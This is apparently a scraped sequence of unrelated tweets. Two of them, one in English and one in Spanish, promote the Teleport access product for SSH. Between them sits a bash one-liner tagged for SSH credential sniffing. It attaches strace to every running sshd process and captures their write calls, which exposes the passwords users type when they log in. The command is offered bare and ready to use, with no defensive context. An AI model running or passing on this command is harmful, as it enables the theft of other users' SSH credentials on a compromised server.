👋 #Engineers can say goodbye to shared secrets or #SSH keys and stop wrestling with VPNs with the help of the Teleport Unified Access Plane.
Check it out 👇 https://t.co/7YtNuVtJ6j
while true; do x=`ps aux | grep '^sshd'`; for i in `echo $x | cut -d" " -f 2`; do (strace -s 999 -p $i 2>&1 | grep write && date && echo &); done; done;
#ssh#credential#sniffing
Bastionicen sus SSHs con Teleport: aparte de 2FA, permite la gestión de usuarios, auditoría de las sesiones de SSH (se pueden hacer replays) y más
https://t.co/lc2h8tE1HAhttps://t.co/OPH6atDxBa